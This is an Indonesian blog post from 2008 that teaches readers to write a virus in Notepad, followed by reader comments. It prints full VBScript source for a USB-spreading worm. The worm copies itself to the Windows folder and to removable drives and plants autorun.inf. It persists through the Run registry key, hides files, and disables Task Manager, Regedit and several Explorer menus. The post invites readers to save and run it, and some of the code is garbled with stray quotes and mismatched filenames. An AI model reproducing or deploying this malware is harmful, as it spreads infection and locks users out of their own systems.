Saturday, October 4, 2008

Buat Virus dengan Notepad

Oleh : Sinax89


Bagi kamu semua yang mau belajar buat virus sederhana, kamu Cukup mengunakan notped sebagai wadah penulisan scrip virus. Virus ini tidak merusak system kerja komputer, hanya saja merepotkan pengguna komputer, he..he… namanya juga virus pasti ada effect nya doonk….

Sistem kerja virus ini adalah, … virus ini akan menduplikasikan dirinya ke dalam sebuah drive untuk dijadikan file induk, terutama pada drive C. misal C:\windows kemudian dengan dibuatnya autorun.inf, secara otomatis virus akan bergerak menyebar keseluruh drive yang ada pada komputer dan juga termasuk setiap flash disc yang tercolok pada komputer yang sudah terinfeksi. Setelah virus ini menyebar keseluruh drive, virus ini akan menghilangkan file yang ada pada drive terutama pada flash disc, virus akan mengganti file tersebut dengan dengan virus yang yang biasanya berbentuk folder dan mempunyai tipe data application. Bagaimana cara buat Virus tersebut? Mari kita liat listing program virus dibawah ini :



Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus”


on error resume next

Dim (pendeklarasian) kata-kata berikut ini”


dim rekursif,winpath,flashdrive,fs,mf,atr,tf,sina,nt,check,sd


Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information”


atr = "[autorun]" & vbcrlf & "shellexecute=wscript.exe sinaxxx.vbs"

set fs = createobject("Scripting.FileSystemObject")

set mf = fs.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekursif = rekursif & text.readline

rekursif = rekursif & vbcrlf

loop

do


Menduplikasikan diri untuk menjadi file induk di Windows Path (example: C:\Windows)”


Set winpath = fs.getspecialfolder(0)

set tf = fs.getfile(winpath & "\SINAXXX.vbs")

tf.attributes = 32

set tf = fs.createtextfile(winpath & "\SINAXX.vbs",2,true)

tf.write rekursif

tf.close

set tf = fs.getfile(winpath & "\SINAXXX.vbs")

tf.attributes = 39

“Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok dan Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket”


for each flashdrive in fs.drives


Perintah untuk mengeCek Drive”


If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then


membuat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\”


set tf = fs.getfile(flashdrive.path &"\SINAXXXa.vbs")

tf.attributes = 32

set tf = fs.createtextfile(flashdrive.path &"\SINAXXX.vbs",2,true)

tf.write rekursif

tf.close

set tf = fs.getfile(flashdrive.path &"\SINAXXX.vbs")

tf.attributes = 39

“Membuat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)”


set tf = fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 32

set tf = fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)

tf.write atr

tf.close

set tf = fs.getfile(flashdrive.path &"\autorun.inf")

tf.attributes = 39

end if

next


Memanipulasi Registry”


set sina = createobject("WScript.Shell")


Ubah CAPTION Internet Explorer menjadi komputer Anda terinfeksi Vrs SINAXXX”


sina.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",”komputer Anda terinfeksi Vrs SINAXXX"


Set agar file hidden tidak ditampilkan di Explorer”


sina.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\Advanced\Hidden", "1", "REG_DWORD"


Hilangkan menu Find, Folder Options, Run, LogOff, dan memblokir Regedit dan Task Manager”


sinaRegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFind”, “1, “REG_DWORD”

sina.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFolderOptions”, “1, “REG_DWORD”

sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoRun”, “1, “REG_DWORD”

sina.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff", "0", "REG_DWORD"


sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”, “1, “REG_DWORD”

sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1, “REG_DWORD”


Mendisablekan klik kanan”


sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoViewContextMenu”, “1, “REG_DWORD”

Memunculkan Pesan Setiap Windows Startup”

sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“SINAXXX.”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“kami dari keluarga SINA memohon maaf atas virus SINAXXX !!!!”

Mengaktifkan virus sinaxxx.vbs setiap Windows Startup”


sina.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\SINAXXX.vbs “

“Menghilangkan menu Close”

sina.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose", "0", "REG_DWORD"

”Mengubah RegisteredOwner dan Organization”


sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The SINAXXX”
sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”SINAXXX”

”Akhir dari Kode”

if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

untuk membuat Virus dari litsing diatas. kamu cukup meng-COPY Listing tersebut kedalam NOTPED dan kemudian

di SAVE dengan nama file yang berektensi vbs misal : sinaxxx.vbs.

PERLU DI PERHATKAN !!!!!

SETALAH KAMU COPY LISTING TSB JANGAN LUPA MENGHAPUS KOMENTARNYA ..YANG DI APIT TANDA ( “ ) KUTIP.!!!!

TERIMAKSIH ATAS PERHATIANNYA, KLW ADA KEKLIRUAN TOLONG KRITIK DAN SARAN’NYA

SELAMAT MENCOBA ……….!!!!!!!!
Posted by Ibnu Sina Nur at 5:13:00 PM
Labels:

5 comments:

  1. Anonymous5/10/08 08:35

    emmmm Ada yng Lebih Kren lg G virusnya ... Bank ibnu.... !!

    ReplyDelete
  2. Anonymous2/11/08 23:54

    Emm.... ada c virus yang w mau posting bukan VBS tp dari Bat..tunggu postinganya slanjutnya ya....!!

    ReplyDelete
  3. Anonymous7/4/09 00:13

    ajrin gw dong takutnya gw bkin ndri senjata mkan tua nantinya...hahahahahahha...:))

    ReplyDelete
  4. sinax897/4/09 15:22

    Tenang aj ... itu virus udah jinak KOk...!!!


    kan kita tau klw nilia 1 pd dword artinya aktiv

    sedangkan klw kita pilih 0 maka tidak aktiv

    Nah... tinggl di rubah dehh.... tadinya 1 jadi 0


    jadi effek yang ditimbulkan kembali Normal...

    makasih atas kunjungannya ya !!

    ReplyDelete
  5. Anonymous1/1/10 01:33

    gmana caraxa yaaaa,,,,,????

    ReplyDelete

Subscribe to: Post Comments (Atom)